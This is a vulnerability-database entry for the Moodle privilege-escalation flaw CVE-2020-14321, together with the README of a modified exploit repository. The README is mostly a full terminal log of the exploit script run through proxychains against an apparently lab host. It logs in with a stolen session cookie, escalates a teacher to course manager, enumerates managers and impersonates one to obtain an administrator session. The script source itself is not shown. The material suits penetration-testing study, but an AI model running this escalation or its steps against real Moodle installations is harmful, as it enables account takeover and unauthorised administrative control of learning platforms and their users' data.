Associated Vulnerability
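Title: Moodle Permission and Access Control Vulnerability (CVE-2020-14321)
Description: Moodle is a free, open-source e-learning software platform, also known as a course management system, learning management system or virtual learning environment. Moodle contains a permission and access control vulnerability that stems from the program not applying correct security restrictions in course enrolment. A remote attacker can exploit this vulnerability to escalate privileges. The following products and versions are affected: Moodle 3.5.0 through 3.5.12, 3.7.0 through 3.7.6, 3.8.0 through 3.8.3, and 3.9.0.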
Description
Modified Moodle exploit for privilege escalation (Dorvack)
Readme
# CVE-2020-14321-modified-exploit
original: `https://github.com/HoangKien1020/CVE-2020-14321`
Modified Moodle exploit for privilege escalation (Dorvack)

```
┌──(kali㉿kali)-[~/…/192.168.1.121/exploits/CVE-2020-14321/modified]
└─$ proxychains python cve202014321.py -url https://formacion.dorvack.corp -cookie jgs48ml47fra5v3r45vdhkokb9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[+] Your target: https://formacion.dorvack.corp
jgs48ml47fra5v3r45vdhkokb9
[+] Logging in to teacher
[proxychains] Strict chain ... 127.0.0.1:8888 ... formacion.dorvack.corp:443 ... OK
[+] Teacher logins successfully!
('profile_url ', 'https://formacion.dorvack.corp/user/profile.php')
('user_id ', u'0')
force_id == 7
('user_id ', 7)
('course_id ', u'2')
('sessKey ', u'N1RVMFIKlu')
[+] Privilege Escalation To Manager in the course Done!
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
('course ', u'https://formacion.dorvack.corp/user/index.php?id=2')
[proxychains] Strict chain ... 127.0.0.1:8888 ... formacion.dorvack.corp:443 ... OK
('context_id: ', u'0')
('get_user ', 'https://formacion.dorvack.corp/user/index.php?contextid=32&roleid=1')
('Manager_id ', [u'7', u'8'])
manager_id == 7 Admin
manager_id == 8 Juanjo ---> of course hack to Juanjo
('url_loginas ', u'https://formacion.dorvack.corp/course/loginas.php?id=2&user=8&sesskey=N1RVMFIKlu')
('new_session ', u'fioOrTuumN')
('go_to----> ', 'https://formacion.dorvack.corp/admin/search.php')
```
After refreshing your browser:

File Snapshot
[4.0K] /data/pocs/628fbf8d68c20b535498adfcb16c5a3edef8bc2e
├── [ 28K] cve202014321.py
├── [128K] login_with_cookie.png
├── [119K] new_admin_session.png
└── [ 12K] README.md
0 directories, 4 files